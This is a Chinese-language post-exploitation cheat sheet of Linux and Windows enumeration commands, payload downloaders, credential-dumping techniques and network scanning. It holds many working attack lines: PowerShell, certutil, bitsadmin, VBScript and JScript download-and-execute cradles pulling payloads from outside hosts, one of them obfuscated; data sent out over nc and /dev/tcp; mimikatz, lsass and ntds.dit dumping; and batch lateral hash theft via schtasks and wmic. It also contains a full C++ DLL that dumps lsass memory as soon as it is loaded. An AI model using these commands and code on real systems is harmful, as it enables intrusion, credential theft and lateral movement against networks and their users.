操作系统&内核版本&环境变量
>cat /etc/issue
>cat /etc/*-release
>cat /etc/lsb-release
>cat /etc/redhat-release
cat /proc/version
>uname -a
>uname -mrs
>rpm -q kernel
>dmesg | grep Linux
>ls /boot | grep vmlinuz-
>cat /etc/profile
>cat /etc/bashrc
>cat ~/.bash_profile
>cat ~/.bashrc
>cat ~/.bash_logout
>env
>set
Root权限进程
>ps aux | grep root
>ps -ef | grep root
计划任务
>crontab -l
>ls -alh /var/spool/cron
>ls -al /etc/ | grep cron
>ls -al /etc/cron*
>cat /etc/cron*
>cat /etc/at.allow
>cat /etc/at.deny
>cat /etc/cron.allow
>cat /etc/cron.deny
>cat /etc/crontab
>cat /etc/anacrontab
>cat /var/spool/cron/crontabs/root
IP信息
>/sbin/ifconfig -a
>cat /etc/network/interfaces
>cat /etc/sysconfig/network
连接信息
>grep 80 /etc/services
>netstat -antup
>netstat -antpx
>netstat -tulpn
>chkconfig --list
>chkconfig --list | grep 3:on
>last
>w
用户信息
>id
>whoami
>w
>last
>cat /etc/passwd
>cat /etc/group
>cat /etc/shadow
>ls -alh /var/mail/
>grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # 列出超级用户
>awk -F: '($3 == "0") {print}' /etc/passwd #列出超级用户
>cat /etc/sudoers
>sudo -l
操作记录
>cat ~/.bash_history
>cat ~/.nano_history
>cat ~/.atftp_history
>cat ~/.mysql_history
>cat ~/.php_history
可写目录
>find / -writable -type d 2>/dev/null # 可写目录
>find / -perm -222 -type d 2>/dev/null # 可写目录
>find / -perm -o=w -type d 2>/dev/null # 可写目录
>find / -perm -o=x -type d 2>/dev/null # 可执行目录
>find / \( -perm -o=w -perm -o=x \) -type d 2>/dev/null # 可写可执行目录
HTTP服务
>python2 -m SimpleHTTPServer
>python3 -m http.server 8080
>php -S 0.0.0.0:8888
>openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
>openssl s_server -key key.pem -cert cert.pem -accept 443 -WWW
>ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 8888,:DocumentRoot => Dir.pwd).start"
>ruby -run -e httpd . -p 8888
文件操作
>cd /d E: && dir /b /s index.php
>for /r E:\ %i in (index*.php) do @echo %i
>powershell Get-ChildItem d:\ -Include index.php -recurse
Linux查找文件
#find / -name index.php
查找木马文件
>find . -name '*.php' | xargs grep -n 'eval('
>find . -name '*.php' | xargs grep -n 'assert('
>find . -name '*.php' | xargs grep -n 'system('
读文本文件:
>$file = Get-Content "1.txt"
>$file
>powershell Set-content "1.txt" "wocao"
&
>powershell "write-output ([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(\"d2Vic2hlbGw=\"))) | out-file -filepath c:\www\wwwroot\1.aspx;"
压缩
>rar.exe a -k -r -s -m3 C:\1.rar C:\wwwroot
>7z.exe a -r -p12345 C:\1.7z C:\wwwroot
>rar.exe e c:\wwwroot\1.rar
>7z.exe x -p12345 C:\1.7z -oC:\wwwroot
>open 192.168.0.98 21
>输入账号密码
>dir查看文件
>get file.txt
#1.vbs
' 1.vbs: downloads the hard-coded URL with Msxml2.XMLHTTP (synchronous GET,
' no status or error checking) and writes the raw response body to C:\1.exe
' through ADODB.Stream.
' Detection note: a script host (cscript/wscript) instantiating XMLHTTP and
' then writing a PE file is a common ingress pattern worth alerting on.
Set Post = CreateObject("Msxml2.XMLHTTP")
' Created but never used anywhere in this script.
Set Shell = CreateObject("Wscript.Shell")
' Third argument 0 = synchronous request.
Post.Open "GET","http://192.168.1.192/Client.exe",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
' Mode 3 = read/write; Type 1 = binary.
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
' Second argument 2 = adSaveCreateOverWrite: an existing C:\1.exe is replaced silently.
aGet.SaveToFile "C:\1.exe",2
>cscript 1.vbs
' Same download-to-disk pattern as 1.vbs, using Msxml2.ServerXMLHTTP so that
' server-certificate errors can be suppressed with SetOption.
Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
Dim http,ado
Set http = CreateObject("Msxml2.serverXMLHTTP")
' NOTE(review): "//" is not a comment marker in VBScript (only ' and Rem are),
' so the trailing text on the next line is a syntax error as written.
' Option 2 is SXH_OPTION_IGNORE_SERVER_SSL_CERT_ERROR_FLAGS and 13056 is
' SXH_SERVER_CERT_IGNORE_ALL_SERVER_ERRORS: TLS validation is disabled, which
' also leaves the download open to on-path tampering.
http.SetOption 2,13056//忽略HTTPS错误
' False = synchronous request; no status code is checked after send.
http.open "GET","http://192.168.1.192/Client.exe",False
http.send
Set ado = createobject("Adodb.Stream")
ado.Type = adTypeBinary
ado.Open
ado.Write http.responseBody
' adSaveCreateOverWrite is declared above but not passed here, so SaveToFile
' presumably uses its default (adSaveCreateNotExist) and fails if c:\1.exe
' already exists.
ado.SaveToFile "c:\1.exe"
ado.Close
JS
// Windows Script Host (JScript) downloader: fetches the URL given as the first
// script argument with WinHttpRequest and writes the raw body to 1.exe in the
// current directory. No status-code or error checking is performed.
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
// WScript.Arguments(0) is the URL passed on the cscript command line.
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
// Assigned without var, so BinStream becomes a global.
BinStream = new ActiveXObject("ADODB.Stream");
// Type 1 = binary stream.
BinStream.Type = 1; BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
// Relative path, resolved against the script host's working directory.
BinStream.SaveToFile("1.exe");
>cscript /nologo 1.js http://192.168.1.192/Client.exe
>bitsadmin /transfer n http://192.168.1.192/Client.exe e:\1.exe
>bitsadmin /rawreturn /transfer getfile http://192.168.1.192/Client.exe e:\1.exe
>bitsadmin /rawreturn /transfer getpayload http://192.168.1.192/Client.exe e:\1.exe
>bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.1.192/Client.exe" "e:\1.exe "
Powershell
注意:内核5.2以下版本可能无效
>powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/Client.exe','C:\1.exe'); start-process 'c:\1.exe'
>powershell
>(New-Object System.Net.WebClient).DownloadFile('http://192.168.0.108/1.exe',"$env:APPDATA\csrsv.exe");Start-Process("$env:APPDATA\csrsv.exe")
PS>Copy-Item '\\sub2k8.zone.com\c$\windows\1.txt' -Destination '\\dc.zone.com\c$\1.txt'
3
>powershell ($dpl=$env:temp+'f.exe');(New-Object System.Net.WebClient).DownloadFile('http://192.168.0.108/ok.txt',$dpl);
4
高版本
PS>iwr -Uri http://192.168.0.106:1222/111.txt -OutFile 123.txt -UseBasicParsing
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates
>Import-Module BitsTransfer
>$path = [environment]::getfolderpath("temp")
>Start-BitsTransfer -Source "http://192.168.0.108/ok.txt" -Destination "$path\ok.txt"
>Invoke-Item "$path\ok.txt"
Certutil
>certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe
>certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe delete
对文件进行编码下载后解码执行
>base64 payload.exe > /var/www/html/1.txt # 在C&C上生成经base64编码的exe
>certutil -urlcache -split -f http://192.168.0.107/1.txt & certutil -decode 1.txt ms.exe & ms.exe
Python
#python -c 'import urllib;urllib.urlretrieve("http://192.168.1.192/Client.exe","/path/to/save/1.exe")'
Perl
#!/usr/bin/perl
# Fetches the hard-coded URL with LWP::Simple::getstore and writes the body to
# ./1.exe. getstore's return value (the HTTP status code) is discarded, so a
# non-2xx response is never detected.
use LWP::Simple;
getstore("http://192.168.1.192/Client.exe", "1.exe");
PHP
#!/usr/bin/php
<?php $data = @file("http://192.168.1.192/Client.exe");
// NOTE(review): file() returns an array of *lines*, and only $data[0] (the bytes
// up to the first newline) is written below, so any binary longer than its first
// line is truncated. With @ suppressing errors, a failed fetch leaves $data ===
// false and an empty 1.exe is written without any warning.
$lf = "1.exe";
// fopen's false return on failure is not checked.
$fh = fopen($lf, 'w');
fwrite($fh, $data[0]);
fclose($fh);
?>
Curl
#curl -o 1.exe http://192.168.1.192/Client.exe
#wget http://192.168.1.192/Client.exe
#wget -b 后台下载
#wget -c 中断恢复
nc
>nc -lvnp 333 >1.txt
目标机
>nc -vn 192.168.1.2 333 <test.txt -q 1
&
>cat 1.txt >/dev/tcp/1.1.1.1/333
SCP
Linux中传输文件
>scp -P 22 file.txt user@1.1.1.1:/tmp
https://www.objectif-securite.ch/en/ophcrack
http://cracker.offensive-security.com/index.php
GoogleColab破解hash
之前在freebuf上看到过相关文章,最近在github上也看到了这个脚本,所以拿起来试试,速度可观
https://www.freebuf.com/geek/195453.html
https://gist.github.com/chvancooten/59acfbf1d8ee7a865108fca2e9d04c4a
打开
https://drive.google.com/drive
新建一个文件夹,右键,更多选择google Colab
如果没有,点关联更多应用,搜索这个名字,安装一下即可
安装hashcat,下载字典
运行类型选择GPU加速
这里测试个简单密码
12亿条密码大概20多分钟
https://download.weakpass.com/wordlists/1851/hashesorg2019.gz
以上是字典
密码策略
默认情况,主机账号的口令每30天变更一次
>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Netlogon\Parameters,键值为DisablePasswordChange,设置为1,即表示禁止修改账号口令
>组策略(gpedit.msc)中修改默认的30天,修改位置为"Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Domain member: Maximum machine account password age"设置为0时,表示无限长
>禁止修改主机账号口令,用来支持VDI (virtual desktops)等类型的使用,具体位置为"Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Domain member: Disable machine account password changes"
Debug Privilege
本地安全策略>本地策略>用户权限分配>调试程序
Cmd
>reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
powershell
>Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -Name UseLogonCredential -Type DWORD -Value 1
meterpreter
>reg setval -k HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest -v UseLogonCredential -t REG_DWORD -d 1
Getpass
>getpassword.exe>1.txt
QuarksPwDump
>QuarksPwDump.exe -dump-hash-local
MSF
Meterpreter > run hashdump
&
Meterpreter > mimikatz_command -f samdump::hashes
&
Meterpreter > load mimikatz
Meterpreter > wdigest
&
Meterpreter > load mimikatz
Meterpreter > msv
Meterpreter > kerberos
&
Meterpreter > load kiwi
Meterpreter > creds_all
&
Meterpreter > migrate PID
Meterpreter > load mimikatz
Meterpreter > mimikatz_command -f sekurlsa::searchPasswords
&
Meterpreter > run windows/gather/smart_hashdump
Empire
>usemodule credentials/mimikatz/dcsync_hashdump
Invoke-Dcsync
>powershell -nop -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-DCSync.ps1');invoke-dcsync
抓明文
>powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.108/nishang/Gather/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
抓hash
>powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.100/nishang/Gather/Get-PassHashes.ps1');Get-PassHashes
>powershell -w hidden -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/powersploit/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz" >C:\Users\Administrator.DC\Desktop\1123.txt
横向批量抓hash
把IP列表放入ip.txt文件中,通过一个账户密码批量net use与列表里的IP建立连接,如果建立连接没出错的话,复制getpass到目录temp目录,使用账户密码远程创建计划任务名字为windowsupdate,指定每日00:00以system权限执行getpass文件,创建完计划任务后,/tn是立刻执行此计划任务,执行完后删除此计划任务,ping -n 10>nul是程序停留,相当于延时10秒,之后复制文件到本地,接着删除getpass文件,删除创建的连接。
>for /f %i in (ip.txt) do net use \\%i\admin$ /user:"administrator" "password" & if %errorlevel% equ 0 ( copy getpass.exe \\%i\admin$\temp\ /Y ) & schtasks /create /s "%i" /u "administrator" /p "password" /RL HIGHEST /F /tn "windowsupdate" /tr "c:\windows\temp\getpass.exe" /sc DAILY /mo 1 /ST 00:00 /RU SYSTEM & schtasks /run /tn windowsupdate /s "%i" /U "administrator" /P "password" & schtasks /delete /F /tn windowsupdate /s "%i" /U " administrator" /P "password" & @ping 127.0.0.1 -n 10 >nul & move \\%i\admin$\temp\dumps.logs C:\Users\Public\%i.logs & del \\%i\admin$\debug\getpass.exe /F & net use \\%i\admin$ /del
Wmic
>for /f %i in (ip.txt) do net use \\%i\admin$ /user:"administrator" "password" & if %errorlevel% equ 0 ( copy getpass.exe \\%i\admin$\temp\ /Y ) & wmic /NODE:"%i" /user:"administrator" /password:"password" PROCESS call create "c:\windows\temp\getpass.exe" & @ping 127.0.0.1 -n 10 >nul & move \\%i\admin$\temp\dumps.logs C:\Users\Public\%i.logs & del \\%i\admin$\temp\getpass.exe /F & net use \\%i\admin$ /del
直接使用
>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt
>privilege::debug
>misc::memssp
锁屏
>rundll32.exe user32.dll,LockWorkStation
记录的结果在c:\windows\system32\mimilsa.log
>mimikatz log "privilege::debug" "lsadump::lsa /patch"
>mimikatz !privilege::debug
>mimikatz !token::elevate
>mimikatz !lsadump::sam
>powershell -c " ('IEX '+'(Ne'+'w-O'+'bject Ne'+'t.W'+'ebClien'+'t).Do'+'wnloadS'+'trin'+'g'+'('+'1vchttp://'+'192.168.0'+'.101/'+'Inv'+'oke-Mimik'+'a'+'tz.'+'ps11v'+'c)'+';'+'I'+'nvoke-Mimika'+'tz').REplaCE('1vc',[STRing][CHAR]39)|IeX"
.net 2.0
katz.cs放置C:\Windows\Microsoft.NET\Framework\v2.0.50727
Powershell执行
>$key = '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'
>$Content = [System.Convert]::FromBase64String($key)
>Set-Content key.snk -Value $Content -Encoding Byte
Cmd执行
>C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /r:System.EnterpriseServices.dll /out:katz.exe /keyfile:key.snk /unsafe katz.cs
>C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe katz.exe
.net 4.0 Msbuild
>C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild mimi.xml
>wmic os get /format:"mimikatz.xsl"
>wmic os get /format:"http://192.168.0.107/ps/mimi.xsl"
Procdump64+mimikatz
>procdump64.exe -accepteula -64 -ma lsass.exe lsass.dmp
>procdump.exe -accepteula -ma lsass.exe lsass.dmp
>mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
>powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/TheKingOfDuck/hashdump/master/procdump/procdump.ps1');Invoke-Procdump64 -Args '-accepteula -ma lsass.exe lsass.dmp'"
Dumpert
https://github.com/outflanknl/Dumpert
有三种,分别是dll,可执行文件和cs的Aggressor插件,这里测试下dll和exe
DLL的执行方式是
rundll32.exe C:\Outflank-Dumpert.dll,Dump
文件保存在c:\windows\temp\dumpert.dmp
用mimikatz
>sekurlsa::minidump c:\windows\temp\dumpert.dmp
>sekurlsa::logonpasswords
可执行文件就直接执行就可以了
https://gist.github.com/xpn/c7f6d15bf15750eae3ec349e7ec2380e
将三个文件下载到本地,使用visual studio进行编译,需要修改了几个地方。
(1)添加如下代码
#pragma comment(lib, "Rpcrt4.lib") (引入Rpcrt4.lib库文件)
(2)将.c文件后缀改成.cpp (使用了c++代码,需要更改后缀)
(3) 编译时选择x64
编译得到exe文件
Visual studio创建c++空项目
配置类型选dll
字符集选Unicode,调试器选64位
Dll保存在C:\\windows\\temp\\1.bin
#include <cstdio>
#include <windows.h>
#include <DbgHelp.h>
#include <iostream>
#include <string>
#include <map>
#include <TlHelp32.h>
#pragma comment(lib,"Dbghelp.lib")
using namespace std;
// Returns the PID of the first process whose image name is lsass.exe, or -1 when
// none is found, by walking a Toolhelp32 process snapshot (TH32CS_SNAPPROCESS).
// NOTE(review): the found-path returns from inside the loop without calling
// CloseHandle(hProcessSnap), leaking the snapshot handle; the snapshot-failure
// path returns `false` (0), which callers cannot distinguish from PID 0.
int FindPID()
{
PROCESSENTRY32 pe32;
// dwSize must be set before Process32First or the call fails.
pe32.dwSize = sizeof(pe32);
HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hProcessSnap == INVALID_HANDLE_VALUE) {
cout << "CreateToolhelp32Snapshot Error!" << endl;;
return false;
}
BOOL bResult = Process32First(hProcessSnap, &pe32);
while (bResult)
{
// Case-insensitive wide compare; szExeFile is wide because the build notes on
// this page select the Unicode character set (PROCESSENTRY32 -> PROCESSENTRY32W).
if (_wcsicmp(pe32.szExeFile, L"lsass.exe") == 0)
{
return pe32.th32ProcessID;
}
bResult = Process32Next(hProcessSnap, &pe32);
}
CloseHandle(hProcessSnap);
return -1;
}
// Function-pointer types for the two exports resolved at run time in dump():
// comsvcs!MiniDumpW(arg1, arg2, L"<pid> <output path> full") and
// ntdll!RtlAdjustPrivilege(privilege, enable, currentThread, &wasEnabled).
typedef HRESULT(WINAPI* _MiniDumpW)(
DWORD arg1, DWORD arg2, PWCHAR cmdline);
typedef NTSTATUS(WINAPI* _RtlAdjustPrivilege)(
ULONG Privilege, BOOL Enable,
BOOL CurrentThread, PULONG Enabled);
// Writes a full memory dump of lsass.exe to C:\windows\temp\1.bin through the
// MiniDumpW export of comsvcs.dll (the same primitive as the
// `rundll32 comsvcs.dll MiniDump` one-liner elsewhere on this page).
// Always returns 0, whether or not the dump was produced.
// Defender note: an arbitrary process loading comsvcs.dll and then writing a
// large file under %windir%\temp is the observable for this technique.
int dump() {
// Declared but never used.
HRESULT hr;
_MiniDumpW MiniDumpW;
_RtlAdjustPrivilege RtlAdjustPrivilege;
ULONG t;
// comsvcs.dll is loaded on demand; if LoadLibrary fails GetProcAddress gets NULL.
MiniDumpW = (_MiniDumpW)GetProcAddress(
LoadLibrary(L"comsvcs.dll"), "MiniDumpW");
RtlAdjustPrivilege = (_RtlAdjustPrivilege)GetProcAddress(
GetModuleHandle(L"ntdll"), "RtlAdjustPrivilege");
if (MiniDumpW == NULL) {
return 0;
}
// try enable debug privilege
// Privilege 20 = SE_DEBUG_PRIVILEGE. Neither a NULL RtlAdjustPrivilege nor the
// returned NTSTATUS is checked, so a failed elevation goes unnoticed.
RtlAdjustPrivilege(20, TRUE, FALSE, &t);
wchar_t ws[100];
// Builds "<pid> C:\windows\temp\1.bin full". NOTE(review): %hd formats the int
// PID as a signed 16-bit value, so PIDs above 32767 are rendered incorrectly;
// FindPID() returning -1 (not found) is also passed through unhandled.
swprintf(ws, 100, L"%hd%hs", FindPID(), " C:\\windows\\temp\\1.bin full");
MiniDumpW(0, 0, ws);
return 0;
}
// DLL entry point: runs dump() once on DLL_PROCESS_ATTACH, i.e. as soon as any
// process loads this DLL, and ignores the thread/detach notifications. Always
// returns TRUE so the load succeeds. Note that dump() therefore executes under
// the loader lock; hModule and lpReserved are unused.
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH:
dump();
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
>xxx.exe c:\xx\xx\xx.dll使用绝对路径
https://github.com/FSecureLABS/physmem2profit
mimikatz被多数安全人员用来获取凭据,但现在的AV/EDR很轻易的识别并查杀,这里不在服务器端使用mimikatz,远程对lsass进程进行转储。
服务器端直接使用visual studio构建
physmem2profit-public\server\
客户端
>git clone --recurse-submodules https://github.com/FSecureLABS/physmem2profit.git
客户端这里先安装
>bash physmem2profit/client/install.sh
需要将此文件
https://github.com/Velocidex/c-aff4/raw/master/tools/pmem/resources/winpmem/att_winpmem_64.sys
传到目标服务器,我这里存放在c:\windows\temp\中
服务器端执行
>Physmem2profit.exe --ip 192.168.0.98 --port 8888 --verbose  (这里的IP是服务器端IP)
攻击端安装所需模块
攻击端执行
>source physmem2profit/client/.env/bin/activate
>cd physmem2profit/client
>python3 physmem2profit --mode all --host 192.168.0.98 --port 8888 --drive winpmem --install 'c:\windows\temp\att_winpmem_64.sys' --label test
服务器端可以看到
把生成的dmp文件转移到win系统上使用mimikatz即可获得hash,当然也可以在linux上使用pypykatz。
再来一条转储lsass进程的命令
要以system权限执行
>rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <lsass pid> lsass.dmp full
位置C:\Program Files\Microsoft SQL Server\number\Shared
>tasklist /svc | findstr lsass.exe 查看lsass.exe 的PID号
>Sqldumper.exe ProcessID PID 0x01100 导出mdmp文件
>mimikatz.exe "sekurlsa::minidump SQLDmpr0001.mdmp" "sekurlsa::logonPasswords full" exit
Mimipenguin
抓取linux下hash,root权限
https://github.com/huntergregal/mimipenguin
缓存hash提取
>reg save hklm\sam c:\sam.hive & reg save hklm\system c:\system.hive & reg save hklm\security c:\security.hive
>mimikatz.exe "lsadump::sam /system:sys.hive /sam:sam.hive" exit
#http://192.168.0.101/powersploit/Exfiltration/Invoke-NinjaCopy.ps1
>powershell -exec bypass
>Import-Module .\invoke-ninjacopy.ps1
>Invoke-NinjaCopy -Path C:\Windows\System32\config\SAM -LocalDestination .\sam.hive
>Invoke-NinjaCopy -Path C:\Windows\System32\config\SYSTEM -LocalDestination .\system.hive
>Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -LocalDestination "C:\Windows\Temp\1.dit"
>Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -ComputerName "dc.zone.com" -LocalDestination "C:\Windows\Temp\1.dit"
>quarks-pwdump.exe -dump-hash-domain
>ntdsutil
>snapshot
>activate instance ntds
>create
>mount {guid}
>copy 装载点\windows\NTDS\ntds.dit d:\ntds_save.dit
>unmount {guid}
>delete {guid}
>quit
&
创建
> ntdsutil snapshot "activate instance ntds" create quit quit
挂载
> ntdsutil snapshot "mount {guid}" quit quit
复制
>copy c:\$SNAP_XXX_VOLUMEC$\windows\NTDS\ntds.dit d:\ntds_save.dit
卸载并删除
> ntdsutil snapshot "unmount {guid}" "delete {guid}" quit quit
删除后检测
> ntdsutil snapshot "List All" quit quit
提取hash
> QuarksPwDump -dump-hash-domain -ntds-file d:\ntds_save.dit
创建C盘卷影拷贝
>vssadmin create shadow /for=c:
复制ntds.dit
>copy {Shadow Copy Volume Name}\windows\NTDS\ntds.dit c:\ntds.dit
删除拷贝
>vssadmin delete shadows /for=c: /quiet
Impacket
Impacket中的secretsdump.py
#impacket-secretsdump -system SYSTEM -ntds ntds.dit LOCAL
或
#impacket-secretsdump -hashes xxx:xxx -just-dc xxx.com/admin\@192.168.1.1
>Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -LocalDestination "C:\Windows\Temp\1.dit"
>reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM.hive
https://github.com/zcgonvh/NTDSDumpEx
>NTDSDumpEx.exe -d ntds.dit -s SYSTEM.hive
>wmic /node:dc /user:xxxx\admin /password:passwd process call create "cmd /c vssadmin create shadow /for=C: 2>&1"
>wmic /node:dc /user:xxxx\admin /password:passwd process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1"
>wmic /node:dc /user:xxxx\admin /password:passwd process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM\ C:\temp\SYSTEM.hive 2>&1"
>copy \\10.0.0.1\c$\temp\ntds.dit C:\temp
PS C:\Users\test.PENTESTLAB> copy \\10.0.0.1\c$\temp\SYSTEM.hive
C:\temp
PS >Import-Module .\VolumeShadowCopyTools.ps1
PS >New-VolumeShadowCopy -Volume C:\
PS >Get-VolumeShadowCopy
PS >Import-Module .\Copy-VSS.ps1
PS >Copy-VSS
PS >Copy-VSS -DestinationDir C:\ShadowCopy\
或MSF中
Meterpreter>load powershell
Meterpreter>powershell_import /root/Copy-VSS.ps1
Meterpreter>powershell_execute Copy-VSS
#lsadump::dcsync /domain:xxx.com /all /csv
或
#privilege::debug
#lsadump::lsa /inject
#use auxiliary/admin/smb/psexec_ntdsgrab
#set rhost smbdomain smbuser smbpass
#exploit
Ntds.dit文件存在/root/.msf4/loot
后渗透模块
#use windows/gather/credentials/domain_hashdump
#set session 1
https://github.com/AlessandroZ/LaZagne
>laZagne.exe all -oN获取所有密码输出到文件
Powershell
PS>[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
PS>$vault = New-Object Windows.Security.Credentials.PasswordVault
PS>$vault.RetrieveAll() | % { $_.RetrievePassword();$_ }
>python3 laZagne.py all
使用Visual studio编译
>Seatbelt.exe ALL获取所有信息
>reg query HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server /v password
http://www.cqure.net/wp/tools/password-recovery/vncpwdump/
解密
>vncpwdump.exe -k hash
>reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v host
>reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v UserName
>reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v pwd
离线破解
https://github.com/HyperSine/how-does-navicat-encrypt-password
>mimikatz dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect
X:\Foxmail\storage\xxx\Accounts\Account.rec0
使用
Foxmail Password Decryptor解密
https://securityxploded.com/foxmail-password-decryptor.php
https://www.nirsoft.net/password_recovery_tools.html
>webbrowserpassview.exe /LoadPasswordsFirefox 1 /shtml "c:\1.html"
或
>dir %appdata%\Mozilla\Firefox\Profiles\
>dir %appdata%\Mozilla\Firefox\Profiles\yn80ouvt.default
需先结束firefox.exe进程
压缩
>7z.exe -r -padmin123 a c:\users\public\firefox.7z C:\Users\Administrator\AppData\Roaming\Mozilla\*.*
https://github.com/unode/firefox_decrypt
https://securityxploded.com/firefox-master-password-cracker.php
SecureCRT
C:\Documents and Settings\Administrator\Application Data\VanDyke下的config文件夹
C:\program files\Vandyke software\securecrt\
https://github.com/uknowsec/SharpDecryptPwd
For+Ping命令查询存活主机
>for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.0.%I |findstr "TTL="
For+Ping命令查询域名对应IP
>for /f "delims=" %i in (D:/domains.txt) do @ping -w 1 -n 1 %i | findstr /c:"[192." >> c:/windows/temp/ds.txt
Windows
>nbtscan.exe -m 192.168.1.0/24
Linux
#nbtscan -r 192.168.0.0/24
#nmap -Pn --open -A -n -v -iL filename.txt
-Pn:跳过主机发现
-n:不做DNS解析
--open:只显示开启的端口
-A:扫描过程中,输入回车,可以查看扫描进度
-v:显示详细信息
-F:快速扫描100个常见端口
-p:选择要扫描的端口 例:-p1-65535 (全端口扫描,中间没有空格)
-iL:为程序指定一个要扫描的IP列表
-sV:探测开放端口的服务和版本信息
-T可以选择扫描等级,默认T3,但想快点话,可以输入 -T4
存活主机
>nmap -sP -PI 192.168.0.0/24
>nmap -sn -PE -T4 192.168.0.0/24
>nmap -sn -PR 192.168.0.0/24
meterpreter > background
msf > use auxiliary/server/socks4a
再配置proxychains.conf
#proxychains nmap -sT -sV -Pn -n -p22,80,135,139,445 --script=smb-vuln-ms08-067.nse 内网IP
#netdiscover -r 192.168.0.0/24 -i wlan0
arp-scan
kali
>arp-scan --interface=wlan0 --localnet
Windows
>arp-scan.exe -t 192.168.0.0/24
#use auxiliary/scanner/discovery/arp_sweep
#use auxiliary/scanner/discovery/udp_sweep
#use auxiliary/scanner/netbios/nbname
meterpreter>run post/windows/gather/arp_scanner RHOSTS=192.168.1.1/24
meterpreter>run post/multi/gather/ping_sweep RHOSTS=192.168.1.1/24
常见端口
服务 | 端口 |
---|---|
Mssql | 1433 |
SMB | 445 |
WMI | 135 |
winrm | 5985 |
rdp | 3389 |
ssh | 22 |
oracle | 1521 |
mysql | 3306 |
redis | 6379 |
postgresql | 5432 |
ldap | 389 |
smtp | 25 |
pop3 | 110 |
imap | 143 |
exchange | 443 |
vnc | 5900 |
ftp | 21 |
rsync | 873 |
mongodb | 27017 |
telnet | 23 |
svn | 3690 |
java rmi | 1099 |
couchdb | 5984 |
pcanywhere | 5632 |
web | 80-90,8000-10000,7001,9200,9300 |
>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/powersploit/Recon/Invoke-Portscan.ps1'); Invoke-Portscan -Hosts 192.168.0.0/24 -T 4 -Ports '1-65535' -oA C:\TEMP.txt"
>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/nishang/Scan/Invoke-PortScan.ps1'); Invoke-Portscan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost -ScanPort"
去掉scanport就是探测存活
https://github.com/ShawnDEvans/smbmap
#use auxiliary/scanner/smb/smb_version查询开启139,445端口主机
#use auxiliary/scanner/smb/smb_login 爆破
#nmap -sU -sS --script smb-enum-shares.nse -p 445 192.168.1.119
>for /l %a in (1,1,254) do start /min /low telnet 192.168.1.%a 445
端口一般139,弱口令连接
>smbclient -L 192.168.0.110
>smbclient '\\192.168.0.110\IPC$'
#use exploit/linux/samba/is_known_pipename
#use auxiliary/scanner/portscan/tcp
#use auxiliary/scanner/portscan/ack
#use auxiliary/scanner/ftp/ftp_version 开启FTP的机器
#use auxiliary/scanner/ftp/anonymous 允许匿名登录的FTP
#use auxiliary/scanner/ftp/ftp_login FTP爆破
#use auxiliary/scanner/http/http_version 开启HTTP服务的
